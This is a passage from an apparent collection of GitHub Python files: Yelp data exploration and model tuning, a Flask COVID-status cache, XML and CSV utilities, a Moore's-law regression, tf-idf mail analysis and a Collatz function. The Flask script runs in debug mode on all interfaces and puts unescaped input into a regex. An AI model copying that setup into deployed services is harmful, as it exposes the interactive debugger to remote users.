from sklearn.linear_model import ElasticNet, Lasso, BayesianRidge, LassoLarsIC
from sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import RobustScaler
from sklearn.base import BaseEstimator, TransformerMixin, RegressorMixin, clone
from sklearn.model_selection import KFold, cross_val_score, train_test_split
from sklearn.metrics import mean_squared_error
import xgboost as xgb
from xgboost.sklearn import XGBRegressor
from sklearn.grid_search import GridSearchCV
from matplotlib.pylab import rcParams
rcParams['figure.figsize'] = 12, 4
from sklearn.metrics import mean_absolute_error
from sklearn.metrics import fbeta_score, make_scorer
from sklearn.metrics import mean_squared_error
from math import sqrt
get_ipython().run_line_magic('matplotlib', 'inline')
# In[2]:
#importing business dataset
business=pd.read_csv("yelp_academic_dataset_business.csv")
end_time=time.time()
print("Took",end_time-start_time,"s")
# In[3]:
#take a peak
business.head()
# In[4]:
business.info()
# In[5]:
#Get the distribution of the ratings
x=business['stars'].value_counts()
x=x.sort_index()
#plot
plt.figure(figsize=(8,4))
ax= sns.barplot(x.index, x.values, alpha=0.8)
plt.title("Star Rating Distribution")
plt.ylabel('# of businesses', fontsize=12)
plt.xlabel('Star Ratings ', fontsize=12)
#adding the text labels
rects = ax.patches
labels = x.values
for rect, label in zip(rects, labels):
height = rect.get_height()
ax.text(rect.get_x() + rect.get_width()/2, height + 5, label, ha='center', va='bottom')
plt.show()
# In[6]:
#Get the distribution of the citys
x=business['city'].value_counts()
x=x.sort_values(ascending=False)
x=x.iloc[0:20]
plt.figure(figsize=(16,4))
ax = sns.barplot(x.index, x.values, alpha=0.8,color=color[3])
plt.title("Which city has the most reviews?")
locs, labels = plt.xticks()
plt.setp(labels, rotation=45)
plt.ylabel('# businesses', fontsize=12)
plt.xlabel('City', fontsize=12)
#adding the text labels
rects = ax.patches
labels = x.values
for rect, label in zip(rects, labels):
height = rect.get_height()
ax.text(rect.get_x() + rect.get_width()/2, height + 5, label, ha='center', va='bottom')
plt.show()
# In[7]:
type(business['categories'])
# In[8]:
print(business['categories'].head())
# In[9]:
# What are the popular business categories?
strinfo = re.compile(' ')
business_cat= business['categories'].str.cat(sep = ',')
business_cats = strinfo.sub('', business_cat)
#print(business_cats)
cats=pd.DataFrame(business_cats.split(','),columns=['category'])
print(cats.head())
x=cats.category.value_counts()
print(x.head(20))
print("There are ",len(x)," different types/categories of Businesses in Yelp!")
#prep for chart
x=x.sort_values(ascending=False)
x=x.iloc[0:20]
# In[10]:
#chart
plt.figure(figsize=(16,4))
ax = sns.barplot(x.index, x.values, alpha=0.8)#,color=color[5])
plt.title("What are the top categories?",fontsize=25)
locs, labels = plt.xticks()
plt.setp(labels, rotation=80)
plt.ylabel('# businesses', fontsize=12)
plt.xlabel('Category', fontsize=12)
#adding the text labels
rects = ax.patches
labels = x.values
for rect, label in zip(rects, labels):
height = rect.get_height()
ax.text(rect.get_x() + rect.get_width()/2, height + 5, label, ha='center', va='bottom')
plt.show()
# In[11]:
business_NLasVeg = business[business['city']=='North Las Vegas']
print(business_NLasVeg.head())
print(business_NLasVeg.info())
# In[12]:
x=business['city'].value_counts()
print(x.head(20))
# In[13]:
#change all the nan value into 0
business_NLasVeg = business_NLasVeg.fillna(0).apply(pd.to_numeric, errors = 'ignore')
print(business_NLasVeg.head())
print(business_NLasVeg['attributes.Ambience'].head())
# In[14]:
# check that all nulls are removed
business_NLasVeg.isnull().sum().sum()
# In[15]:
sns.boxplot(x='attributes.WiFi', y='stars', data=business_NLasVeg);
# In[16]:
print(business_NLasVeg['categories'].head())
# In[17]:
business_NLasVeg.columns
# In[18]:
business_NLasVeg["attributes.RestaurantsAttire"].head(10)
#type(business_NLasVeg["review_count"])
# In[19]:
#split categories columns into sub category column
business_NLasVeg['categories_clean'] = list(map(lambda x: ''.join(x.split()),business_NLasVeg['categories'].astype(str)))
#print(business_NLasVeg['categories_clean'])
categories_df = business_NLasVeg.categories_clean.str.get_dummies(sep=',')
business_NLasVeg = business_NLasVeg.merge(categories_df, left_index=True, right_index=True)
print(business_NLasVeg.info())
#print(business_NLasVeg.head())
print(categories_df.columns)
# In[20]:
select_df = business_NLasVeg[business_NLasVeg['Restaurants'] == 1]
print(categories_df['Restaurants'].value_counts())
#print(select_df.head())
select_df = select_df.drop(columns = ['attributes'])
select_df.iloc[:, 40:60].head(20)
#print(select_df.info())
# In[21]:
print(select_df.info())
# In[22]:
print(select_df.columns)
# In[23]:
# columns with non-boolean categorical values:
cols_to_split = ['attributes.AgesAllowed', 'attributes.Alcohol', 'attributes.BYOBCorkage',
'attributes.NoiseLevel', 'attributes.RestaurantsAttire', 'attributes.Smoking', 'attributes.WiFi']
new_cat = pd.concat([pd.get_dummies(select_df[col], prefix=col, prefix_sep='_') for col in cols_to_split], axis=1)
# keep all columns (not n-1) because 0's for all of them indicates that the data was missing (useful info)
select_df = pd.concat([select_df, new_cat], axis=1)
select_df.drop(cols_to_split, inplace=True, axis=1)
select_df.head()
# In[24]:
print(select_df.info())
# In[25]:
#drop columns with non-numeric
select_df = select_df.select_dtypes(exclude=['object'])
print(select_df.columns)
# In[26]:
print(select_df.info())
# In[27]:
y = select_df['stars']
X = select_df.drop(columns = ['stars'])
# In[28]:
sns.distplot(y, kde=False)
# In[29]:
sns.boxplot(x='attributes.WiFi_free', y='stars', data= select_df)
# In[30]:
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=.3, random_state=1)
print(X_train.shape)
print(X_test.shape)
# In[31]:
lasso = make_pipeline(RobustScaler(), Lasso(alpha =0.0005, random_state=1))
ENet = make_pipeline(RobustScaler(), ElasticNet(alpha=0.0005, l1_ratio=.9, random_state=3))
GBoost = GradientBoostingRegressor(n_estimators=3000, learning_rate=0.05,
max_depth=4, max_features='sqrt',
min_samples_leaf=15, min_samples_split=10,
loss='huber', random_state =5)
# In[32]:
lasso.fit(X_train, y_train)
y_pred_train = lasso.predict(X_train)
print('Train RMSE:')
print(np.sqrt(mean_squared_error(y_train, y_pred_train)))
y_pred_test = lasso.predict(X_test)
print('Test RMSE:')
print(np.sqrt(mean_squared_error(y_test, y_pred_test)))
# In[33]:
ENet.fit(X_train, y_train)
y_pred_train = ENet.predict(X_train)
print('Train RMSE:')
print(np.sqrt(mean_squared_error(y_train, y_pred_train)))
y_pred_test = ENet.predict(X_test)
print('Test RMSE:')
print(np.sqrt(mean_squared_error(y_test, y_pred_test)))
# In[34]:
GBoost.fit(X_train, y_train)
y_pred_train = GBoost.predict(X_train)
print('Train RMSE:')
print(np.sqrt(mean_squared_error(y_train, y_pred_train)))
y_pred_test = GBoost.predict(X_test)
print('Test RMSE:')
print(np.sqrt(mean_squared_error(y_test, y_pred_test)))
# In[35]:
#use cross-validation instead of train-test split for a better estimation of the RMSE
kfold = KFold(n_splits=10, shuffle=True, random_state=1)
cross_val_scores = cross_val_score(GBoost, X, y, scoring='neg_mean_squared_error', cv=kfold)
print('10-fold RMSEs:')
print([np.sqrt(-x) for x in cross_val_scores])
print('CV RMSE:')
print(np.sqrt(-np.mean(cross_val_scores))) # RMSE is the sqrt of the avg of MSEs
print('Std of CV RMSE:')
print(np.std(cross_val_scores))
# In[36]:
#parameters tuning for xgboost
def modelfit(alg,useTrainCV=True, cv_folds=5, early_stopping_rounds=50):
    """Fit the XGBoost regressor *alg* on the module-level X_train/y_train
    split and print its train/test scores.

    When *useTrainCV* is True, xgb.cv with early stopping runs first and
    alg's n_estimators is shrunk to the best boosting round found.

    NOTE(review): despite eval_metric='rmse', the printed "Score" values
    are plain MSE from sklearn's mean_squared_error.
    """
    if useTrainCV:
        xgb_param = alg.get_xgb_params()
        xgtrain =xgb.DMatrix(X_train,label=y_train)
        xgtest = xgb.DMatrix(X_test)  # NOTE(review): built but never used
        cvresult = xgb.cv(xgb_param, xgtrain, num_boost_round=alg.get_params()['n_estimators'], nfold=cv_folds,
            early_stopping_rounds=early_stopping_rounds,show_stdv=False)
        # cv stops early, so its row count is the best number of rounds.
        alg.set_params(n_estimators=cvresult.shape[0])#cvresult.shape[0] and alg.get_params()['n_estimators'] are same
    #Fit the algorithm on the data
    alg.fit(X_train, y_train,eval_metric='rmse')
    #Predict training set:
    dtrain_predictions = alg.predict(X_train)
    #Print model report:
    print("Score (Train): %f" % mean_squared_error(y_train.values, dtrain_predictions))
    #Predict on testing data:
    dtest_predictions = alg.predict(X_test)
    print("Score (Test): %f" % mean_squared_error(y_test.values, dtest_predictions))
# In[37]:
xgb1 = XGBRegressor(booster='gbtree',
objective= 'reg:linear',
eval_metric='rmse',
gamma = 0.1,
min_child_weight= 1.1,
max_depth= 5,
subsample= 0.8,
colsample_bytree= 0.8,
tree_method= 'exact',
learning_rate=0.1,
n_estimators=100,
nthread=4,
scale_pos_weight=1,
seed=27)
modelfit(xgb1)
# In[57]:
get_ipython().run_cell_magic('time', '', "\n#Grid seach for max_depth and min_child_weight tuning\n\nparam_test1 = {\n 'max_depth':[3,5,7,9],\n 'min_child_weight':[1,3,5]\n}\ngsearch1 = GridSearchCV(estimator = XGBRegressor(booster='gbtree',\n objective= 'reg:linear',\n eval_metric='rmse',\n gamma = 0.1,\n min_child_weight= 1.1,\n max_depth= 5,\n subsample= 0.8,\n colsample_bytree= 0.8,\n tree_method= 'exact',\n learning_rate=0.1,\n n_estimators=100,\n nthread=4,\n scale_pos_weight=1,\n seed=27),\n param_grid = param_test1, scoring='mean_squared_error',n_jobs=4,iid=False, cv=5)\ngsearch1.fit(X_train,y_train)")
# In[39]:
gsearch1.grid_scores_, gsearch1.best_params_, gsearch1.best_score_
# In[58]:
get_ipython().run_cell_magic('time', '', "#try another one\nparam_test1b = {\n 'min_child_weight':[6,8,10,12]\n}\ngsearch1b = GridSearchCV(estimator = XGBRegressor(booster='gbtree',\n objective= 'reg:linear',\n eval_metric='rmse',\n gamma = 0.1,\n min_child_weight= 1.1,\n max_depth= 7,\n subsample= 0.8,\n colsample_bytree= 0.8,\n tree_method= 'exact',\n learning_rate=0.1,\n n_estimators=100,\n nthread=4,\n scale_pos_weight=1,\n seed=27),\n param_grid = param_test1b, scoring='mean_squared_error',n_jobs=4,iid=False, cv=5)\ngsearch1b.fit(X_train,y_train)")
# In[59]:
gsearch1b.grid_scores_, gsearch1b.best_params_, gsearch1b.best_score_
# In[60]:
get_ipython().run_cell_magic('time', '', "#gamma tuning\nparam_test3 = {\n 'gamma':[i/10.0 for i in range(0,5)]\n}\ngsearch3 = GridSearchCV(estimator = XGBRegressor(booster='gbtree',\n objective= 'reg:linear',\n eval_metric='rmse',\n gamma = 0.1,\n min_child_weight= 10,\n max_depth= 7,\n subsample= 0.8,\n colsample_bytree= 0.8,\n tree_method= 'exact',\n learning_rate=0.1,\n n_estimators=100,\n nthread=4,\n scale_pos_weight=1,\n seed=27),\n param_grid = param_test3, scoring='mean_squared_error',n_jobs=4,iid=False, cv=5)\ngsearch3.fit(X_train,y_train)")
# In[61]:
gsearch3.grid_scores_, gsearch3.best_params_, gsearch3.best_score_
# In[62]:
get_ipython().run_cell_magic('time', '', "#subsample and colsample_bytree tuning\nparam_test4 = {\n 'subsample':[i/10.0 for i in range(6,10)],\n 'colsample_bytree':[i/10.0 for i in range(6,10)]\n}\ngsearch4 = GridSearchCV(estimator = XGBRegressor(booster='gbtree',\n objective= 'reg:linear',\n eval_metric='rmse',\n gamma = 0.4,\n min_child_weight= 10,\n max_depth= 7,\n subsample= 0.8,\n colsample_bytree= 0.6,\n tree_method= 'exact',\n learning_rate=0.1,\n n_estimators=100,\n nthread=4,\n scale_pos_weight=1,\n seed=27),\n param_grid = param_test4, scoring='mean_squared_error',n_jobs=4,iid=False, cv=5)\ngsearch4.fit(X_train,y_train)")
# In[63]:
gsearch4.grid_scores_, gsearch4.best_params_, gsearch4.best_score_
# In[64]:
get_ipython().run_cell_magic('time', '', "#reg_alpha、reg_lambda rough tuning\n\nparam_test6 = {\n 'reg_alpha':[1e-5, 1e-2, 0.1, 1, 100]\n}\ngsearch6 = GridSearchCV(estimator = XGBRegressor(booster='gbtree',\n objective= 'reg:linear',\n eval_metric='rmse',\n gamma = 0.4,\n min_child_weight= 10,\n max_depth= 7,\n subsample= 0.8,\n colsample_bytree= 0.6,\n tree_method= 'exact',\n learning_rate=0.1,\n n_estimators=100,\n nthread=4,\n scale_pos_weight=1,\n seed=27),\n param_grid = param_test6, scoring='mean_squared_error',n_jobs=4,iid=False, cv=5)\ngsearch6.fit(X_train,y_train)")
# In[65]:
gsearch6.grid_scores_, gsearch6.best_params_, gsearch6.best_score_
# In[66]:
get_ipython().run_cell_magic('time', '', "##reg_alpha、reg_lambda fine tuning\nparam_test7 = {\n 'reg_alpha':[0, 0.001, 0.005, 0.01, 0.05]\n}\ngsearch7 = GridSearchCV(estimator = XGBRegressor(booster='gbtree',\n objective= 'reg:linear',\n eval_metric='rmse',\n gamma = 0.4,\n min_child_weight= 10,\n max_depth= 7,\n subsample= 0.8,\n colsample_bytree= 0.6,\n tree_method= 'exact',\n learning_rate=0.1,\n n_estimators=100,\n nthread=4,\n scale_pos_weight=1,\n seed=27),\n param_grid = param_test7, scoring='mean_squared_error',n_jobs=4,iid=False, cv=5)\ngsearch7.fit(X_train,y_train)")
# In[67]:
gsearch7.grid_scores_, gsearch7.best_params_, gsearch7.best_score_
# In[68]:
get_ipython().run_cell_magic('time', '', "#reduce learning_rate, increase n_estimators\nparam_test9 = {\n 'n_estimators':[50, 100, 200, 500,1000],\n 'learning_rate':[0.001, 0.01, 0.05, 0.1,0.2]\n}\ngsearch9 = GridSearchCV(estimator = XGBRegressor(booster='gbtree',\n objective= 'reg:linear',\n eval_metric='rmse',\n gamma = 0.4,\n min_child_weight= 10,\n max_depth= 7,\n subsample= 0.8,\n colsample_bytree= 0.6,\n tree_method= 'exact',\n learning_rate=0.1,\n n_estimators=100,\n nthread=4,\n scale_pos_weight=1,\n reg_alpha=0.01, \n seed=27),\n param_grid = param_test9, scoring='mean_squared_error',n_jobs=4,iid=False, cv=5)\ngsearch9.fit(X_train,y_train)\n")
# In[69]:
gsearch9.grid_scores_, gsearch9.best_params_, gsearch9.best_score_
# In[52]:
xgb9 = XGBRegressor(booster='gbtree',
objective= 'reg:linear',
eval_metric='rmse',
gamma = 0.4,
min_child_weight= 10,
max_depth= 7,
subsample= 0.8,
colsample_bytree= 0.6,
tree_method= 'exact',
learning_rate=0.01,
n_estimators=500,
nthread=4,
scale_pos_weight=1,
reg_alpha=0.05,
seed=27)
# In[53]:
xgb9.fit(X_train,y_train)
# In[54]:
sqrt(mean_squared_error(xgb9.predict(X_test),y_test))
# In[55]:
fig, ax = plt.subplots(1, 1, figsize=(8, 13))
xgb.plot_importance(xgb9, max_num_features=20, height=0.5, ax=ax)
| shayan113/Yelp-Data-Exploration | Yelp Dataset Exploration2.py | Yelp Dataset Exploration2.py | py | 17,612 | python | en | code | 0 | github-code | 50 |
74571782556 | from flask import Flask, request
import re
import os
import sys
import time
import json
import requests
debug = True
covid_cache = {}
def fetch_status(id):
    """Populate covid_cache[id] with the school's current COVID figures.

    Uses a one-hour in-memory cache; on a miss (or a stale entry) it streams
    the upstream CSV and parses the row whose centre code equals *id*.
    Returns True on success, False on an exception, and None when no row
    matched — callers should treat anything falsy as a failure.
    """
    global covid_cache
    try:
        if id in covid_cache.keys():
            # Cached entries are considered fresh for one hour.
            if time.time()-covid_cache[id]['timestamp'] < 3600:
                if debug: print("cached data")
                return True
            else:
                if debug: print("updating scached data")
        # DATAGENERACIO;DATACREACIO;CODCENTRE;CODIMUNICIPI;ESTAT;GRUP_CONFIN;ALUMN_CONFIN;DOCENT_CONFIN;ALTRES_CONFIN;GRUP_ESTABLE;ALUMN_POSITIU;PERSONAL_POSITIU;ALTRES_POSITIU
        # 01/10/2020 7:00;28/09/2020 9:28;IDCENTRE;MUNICIPI;Obert;0;6;0;0;51;0;0;0
        # DATAGENERACIO;DATACREACIO;CODCENTRE;ESTAT;GRUP_CONFIN;ALUMN_CONFIN;DOCENT_CONFIN;ALTRES_CONFIN;GRUP_ESTABLE;ALUMN_POSITIU;PERSONAL_POSITIU;ALTRES_POSITIU
        # 03/10/2020 7:00;02/10/2020 8:51;IDCENTRE;Obert;0;5;0;0;51;0;0;0
        # NOTE(review): *id* is interpolated into the pattern unescaped —
        # fine for numeric centre codes, unsafe for arbitrary input.
        regex_str = '[0-9]+/[0-9]+/[0-9]+ [0-9]+:[0-9]+;([0-9]+)/([0-9]+)/[^;]+;'+id+';([^;]+);([0-9]+);([0-9]+);([0-9]+);([0-9]+);[0-9]+;([0-9]+);([0-9]+);([0-9]+)'
        if debug: print(regex_str)
        # stream=True so the CSV is scanned line by line, not fully downloaded.
        r = requests.get('https://tracacovid.akamaized.net/data.csv', stream=True)
        for line in r.iter_lines(decode_unicode=True):
            if debug: print(line)
            m = re.search(regex_str, line)
            if m:
                # Encode day/month of the creation date as an ordinal (day*100+month).
                ultim_update = (int(m.group(1))*100)+int(m.group(2))
                estat_centre = m.group(3)
                groups_confinats = int(m.group(4))
                # Confined = pupils + teachers + other staff.
                confinats = int(m.group(5))+int(m.group(6))+int(m.group(7))
                # Positives = pupils + personnel + others.
                positius = int(m.group(8))+int(m.group(9))+int(m.group(10))
                covid_cache[id] = {
                    'timestamp': time.time(),
                    'ultim_update': ultim_update,
                    'estat_centre': estat_centre,
                    'groups_confinats': groups_confinats,
                    'confinats': confinats,
                    'positius': positius
                }
                return True
    except Exception as e:
        # Best-effort logging of where the failure happened, then report failure.
        exc_type, exc_obj, exc_tb = sys.exc_info()
        fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
        print(exc_type, fname, exc_tb.tb_lineno)
        print(str(e))
        return False
app = Flask(__name__)
@app.route('/school/<id>')
def query_example(id):
    """Return the cached COVID status of school *id* as a JSON string.

    Triggers a (possibly cached) refresh via fetch_status(), then returns
    the cache entry serialised with json.dumps, or {'WTF': True} when the
    school is unknown or the upstream fetch failed.
    """
    fetch_status(id)
    # dict.get avoids the KeyError the old bare `except: pass` silently hid,
    # and removes the duplicated fallback return.
    entry = covid_cache.get(id)
    if entry:
        return json.dumps(entry)
    return { 'WTF': True }
app.run(host='0.0.0.0', debug=debug, port=5000) | jordiprats/python-covidcache | covidcache.py | covidcache.py | py | 2,818 | python | en | code | 0 | github-code | 50 |
25604701736 | import csv
from typing import Dict
from pathlib import Path
import xml.etree.ElementTree as ET
def get_namespace(root: ET.Element) -> Dict[str, str]:
    """Return {'page': <namespace URI>} extracted from *root*'s qualified tag.

    ElementTree qualifies tags as '{uri}local'; for an unqualified tag the
    tag itself is returned unchanged.
    """
    uri, _, _ = root.tag.partition('}')
    return {"page": uri.lstrip('{')}
def export_stats(stats: dict, output_dir: Path):
    """Write *stats* ({project name: ground-truth line count}) to
    <output_dir>/stats.csv.

    The file gets a "Project" / "Lines of ground truth" header row followed
    by one row per project.  I/O errors propagate to the caller (the old
    ``except IOError as e: raise e`` added nothing but noise).
    """
    csv_header = ["Project", "Lines of ground truth"]
    # newline="" is the documented way to open csv-writer targets; without
    # it rows get doubled line endings on Windows.
    with Path(output_dir, "stats.csv").open("w", newline="") as statsfile:
        writer = csv.DictWriter(statsfile, fieldnames=csv_header)
        writer.writeheader()
        # Renamed loop variable: the original shadowed the builtin dir().
        for project, line_count in stats.items():
            writer.writerow({'Project': project, 'Lines of ground truth': line_count})
raise e
def cprint(fmt, fg=None, bg=None, style=None):
    """
    Print *fmt* wrapped in ANSI colour/style escape codes.

    cprint('Hello!')                              # plain
    cprint('Hello!', fg='g')                      # green text
    cprint('Hello!', fg='r', bg='w', style='bx')  # bold blinking red on white

    Colours (fg / bg): k black, r red, g green, y yellow,
                       b blue, m magenta, c cyan, w white
    Styles: b bold, i italic, u underline, s strikethrough, x blinking,
            r reverse, y fast blinking, f faint, h hide
    """
    # SGR code tables: colours are offsets 0-7, styles are codes 1-9.
    colour_of = {c: n for n, c in enumerate('krgybmcw')}
    style_of = {c: n for n, c in enumerate('bfiuxyrhs', start=1)}

    codes = []
    if isinstance(style, str):
        codes.extend(style_of[ch] for ch in style)
    if isinstance(fg, str):
        codes.append(30 + colour_of[fg])   # 30-37: foreground
    if isinstance(bg, str):
        codes.append(40 + colour_of[bg])   # 40-47: background

    if codes:
        print(f"\x1b[{';'.join(map(str, codes))}m{fmt}\x1b[0m")
    else:
        print(fmt)
| maxnth/GTCounter | src/utils.py | utils.py | py | 2,222 | python | en | code | 1 | github-code | 50 |
601544481 | import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import re
# Load the data
df = pd.read_csv("moore.csv", header = None, sep='\t')
#df.info()
# <class 'pandas.core.frame.DataFrame'>
# RangeIndex: 102 entries, 0 to 101
# Data columns (total 6 columns):
# 0 102 non-null object
# 1 102 non-null object
# 2 102 non-null object
# 3 102 non-null object
# 4 97 non-null object
# 5 95 non-null object
# dtypes: object(6)
# memory usage: 4.9+ KB
#print(df.dtypes)
# 0 object
# 1 object
# 2 object
# 3 object
# 4 object
# 5 object
# dtype: object
#print(type(df[0]))
# <class 'pandas.core.series.Series'>
#print(type(df))
# <class 'pandas.core.frame.DataFrame'>
#print(df[[1, 2]]) # This returns columns with index 1 & 2
#print(df.columns)
# Int64Index([0, 1, 2, 3, 4, 5], dtype='int64') # This gives us the datatype of the column index (not the contents which are above shown as object)
#print(df.columns.values)
# [0 1 2 3 4 5]
#print (type(df.iloc[0, 2])) # Even though df.types returns object, the individual element of row 0, column 2 is a 'str'. This
# <class 'str'> command is essential for determining the data type of individual elements.
#print (type(df.iloc[0, 1])) # Even though df.types returns object, the individual element of row 0, column 1 is a 'str'. This
# <class 'str'> command is essential for determining the data type of individual elements.
df[2] = df[2].replace('\[.*\]', '', regex = True).astype(np.int64) # \[.*\] is for removing references in square brackets
# .astype(np.int64) is for converting from 'str' to 'int64'
df[1] = df[1].str.lstrip('~cca').str.rstrip('') # strips ~ & cca characters from data
df[1] = df[1].replace('\,', '', regex = True) # strips , from data
df[1] = df[1].replace('\[.*\]', '', regex = True).astype(np.int64)
#print (type(df.iloc[0, 2])) # The individual element of row 0, column 2 is now a 'numpy.int64'
# <class 'numpy.int64'>
#print (type(df.iloc[0, 1])) # The individual element of row 0, column 1 is now a 'numpy.int64'
# <class 'numpy.int64'>
# Split the data into data & target. We ignore column 0, 3, 4 & 5. Column 1 (no of transistors) is our target & column 2 (the year) is our data!
data = df[2].values
target = df[1].values
# To convert into log
target = np.log(target)
# This is to calculate the common denominator from variables 'a' & 'b' as solved in my notes!
d1 = np.dot(data, data) / len(data)
d2 = np.power(np.mean(data), 2)
denominator = d1 - d2
# Now calculating numerator for variable 'a' as solved in my notes!
num_a = (np.dot(data, target) / len(data)) - (np.mean(data) * np.mean(target))
# Now calculating numerator for variable 'b' as solved in my notes!
num_b = (np.mean(target) * np.dot(data, data) / len(data)) - np.mean(data) * (np.dot(data, target) / len(data))
# Now calculating variables 'a' & 'b' as solved in my notes!
a = num_a / denominator
b = num_b / denominator
# Now calculating the equation of line with minimum error!
Ypred = a*data + b
# Plotting the data on x-axis & target on y-axis
plt.scatter(data, target, marker = 'o', c = 'Black')
plt.title("Linear Regression")
plt.xlabel("Data")
plt.ylabel("Target")
# Plotting the line of best fit with minimum error
plt.plot(data, Ypred, 'red')
plt.show()
# Calculating R2. First calculating SSE & SST
SSE = np.sum(np.power(target - Ypred, 2))
SST = np.sum(np.power(target - np.mean(target), 2))
R2 = 1 - (SSE/SST)
print("The value of R-squared is:", R2)
# how long does it take to double?
# log(transistorcount) = a*year + b
# transistorcount = exp(b) * exp(a*year)
# 2*transistorcount = 2 * exp(b) * exp(a*year) = exp(ln(2)) * exp(b) * exp(a * year) = exp(b) * exp(a * year + ln(2))
# a*year2 = a*year1 + ln2
# year2 = year1 + ln2/a
print("time to double:", np.log(2)/a, "years")
# Below is my solution for the above
# ln(Ypred) = a*data + b = a*year + b
# Ypred = exp(a*year + b) --> (I)
# 2Ypred = exp(a*yearWhenDoubled + b) --> (II)
# Now putting (I) into (II)
# 2 * exp(a*year + b) = exp(a*yearWhenDoubled + b)
# exp(ln(2) + a*year + b) = exp(a*yearWhenDoubled + b)
# Now if we take ln on both sides, the power comes down to the left & ln(exp) = 1
# ln(2) + a*year + b = a*yearWhenDoubled + b
# ln(2) = a*yearWhenDoubled - a*year
# ln(2) / a = yearWhenDoubled - year | YasirHabib/linear-regression-in-python | Section2/moore_law.py | moore_law.py | py | 4,421 | python | en | code | 0 | github-code | 50 |
30072993488 | # from symbol import term
import matplotlib.pyplot as plt
import numpy as np
import sys
import operator
import argparse
import copy
from nltk.corpus import stopwords
import gensim
from gensim import corpora, models
# from textblob import TextBlob
from bs4 import BeautifulSoup
import pickle
def main():
    """Entry point: run the tf-idf word-frequency analysis on the sample mail dump."""
    word_freq("..\mail_bodies_small.txt")
def word_freq(filename):
    """Compute tf-idf statistics for an asterisk-separated mail-body dump.

    Messages in *filename* are separated by a line of 53 '*'.  Tokens are
    lower-cased and filtered (English stopwords, non-alphanumerics, length
    <= 2, pure numbers).  Writes "tf_idf_data.json" (corpus-wide term
    scores) and "tf_idf.json" (per-document term scores); returns None.
    """
    doc = {}           # term -> aggregated count across all messages
    tf_idf = {}        # doc index -> {term -> tf, later tf-idf}
    doc_words = [[]]   # token list per message, in reading order
    termdf = {}        # term -> occurrence count (see NOTE below)
    msg_doc = {}       # term counts for the message currently being read
    no_of_docs = 0
    doc_length = 0     # filtered token count of the current message
    msg_line_count = 0
    for line in open(filename, encoding="utf-8"):
        line = line.strip()
        if(line == "*****************************************************"):
            # End of one message: fold its counts into the corpus tallies.
            # if(msg_line_count<3):
            #     msg_doc.clear()
            #     msg_line_count = 0
            #     continue
            doc_words.append([])
            msg_line_count = 0
            no_of_docs += 1
            for term in msg_doc:
                if (doc.__contains__(term)):
                    doc[term] = int(doc.get(term)) + msg_doc[term]
                else:
                    # NOTE(review): presumably this should be msg_doc[term],
                    # not 1 — a term's first-message count is dropped. Confirm.
                    doc[term] = 1
            # Normalise raw counts into term frequencies.
            # NOTE(review): doc_length == 0 with a non-empty msg_doc cannot
            # happen (both grow together), but an all-filtered message leaves
            # an empty tf dict for this doc.
            for term in msg_doc:
                msg_doc[term] = msg_doc[term]/doc_length
            #print(msg_doc)
            tf_idf[no_of_docs-1] = copy.deepcopy(msg_doc)
            msg_doc.clear()
            doc_length = 0
        else:
            # if(line[0] != '>'):
            msg_line_count+=1
            # line = BeautifulSoup(line).get_text()
            split = line.split(' ')
            for entry in split:
                entry = entry.lower()
                # NOTE(review): stopwords.words('english') rebuilds its list
                # for every token — hoisting it into a set would be far faster.
                if(entry in stopwords.words('english') or (not entry.isalnum()) or len(entry)<=2):
                    continue
                if(entry.isnumeric() == False):
                    doc_length += 1
                    doc_words[-1].append(entry)
                    if (msg_doc.__contains__(entry)):
                        msg_doc[entry] = int(msg_doc.get(entry)) + 1
                    else:
                        msg_doc[entry] = 1
                    # NOTE(review): incremented per occurrence, so this is
                    # collection frequency, not true document frequency.
                    if(termdf.__contains__(entry)):
                        termdf[entry] = int(termdf.get(entry)) + 1
                    else:
                        termdf[entry] = 1
    tfidf = {}
    #print(tf_idf)
    # Scale each document's term frequencies by idf and sort by score, descending.
    for doct in tf_idf:
        for term in tf_idf[doct]:
            tf_idf[doct][term] = tf_idf[doct][term] * np.log(no_of_docs/termdf[term])
        tf_idf[doct] = {key: val for key, val in sorted(tf_idf[doct].items(), key = lambda ele: ele[1], reverse = True)}
    # for doc in tf_idf:
    #     print(tf_idf[doc])
    # for doct in tf_idf:
    #     for term in tf_idf[doct]:
    #         if term in termdf:
    #             tf_idf[doct][term] = tf_idf[doct][term] * no_of_docs/(1+ termdf[term])
    # Corpus-wide score: aggregated count * idf, sorted descending.
    for term in doc:
        tfidf[term] = doc[term] * np.log(no_of_docs/termdf[term])
    sorted_doc = (sorted(tfidf.items(), key=operator.itemgetter(1)))[::-1]
    print("num docs", no_of_docs)
    # print(sorted_doc)
    # Collect the 40 highest-scoring terms (used by the commented-out plot below).
    top = []
    topfreq = []
    for i in range(min(len(sorted_doc), 40)):
        entry = sorted_doc[i]
        top.append(entry[0])
        topfreq.append(entry[1])
    # NOTE(review): despite the .json names, neither output file is valid JSON.
    with open("tf_idf_data.json","w",encoding="utf-8") as f:
        for doc in sorted_doc:
            if not doc[0][0].isnumeric():
                print(str(doc[0])+":"+str(doc[1])+',\n', file = f)
    with open("tf_idf.json","w",encoding="utf-8") as f:
        for doct in tf_idf.keys():
            print(doct,file=f)
            for term in tf_idf[doct]:
                print(str(term)+":"+str(tf_idf[doct][term])+',\n', file = f)
    # words = [doc[0] for doc in sorted_doc]
    # print(doc_words)
    # dictionary = corpora.Dictionary(doc_words)
    # corpus = [dictionary.doc2bow(text) for text in doc_words]
    # ldamodel = gensim.models.ldamodel.LdaModel(corpus, num_topics = 20, id2word = dictionary, passes = 20)
    # print(ldamodel.print_topics(num_topics = 10, num_words = 10))
    # with open("words","w") as f:
    #     f.write(sorted_doc.keys())
    # plt.barh(y, x)
    # plt.barh(top, topfreq)
    # plt.xlabel("Frequency")
    # plt.ylabel("Word")
    # plt.show()
if __name__ == "__main__":
main() | joelmathew003/Gmail-Mail-Tagging | py scripts/tf_idf_scripts/tf_idf_attempt2.py | tf_idf_attempt2.py | py | 4,219 | python | en | code | 0 | github-code | 50 |
def steps(number):
    """Return how many Collatz steps it takes *number* to reach 1.

    Even values are halved, odd values become 3n + 1.  Raises ValueError
    for zero or negative input.
    """
    if number <= 0:
        raise ValueError("Only positive integers are allowed")
    count = 0
    while number != 1:
        number = number // 2 if number % 2 == 0 else 3 * number + 1
        count += 1
    return count
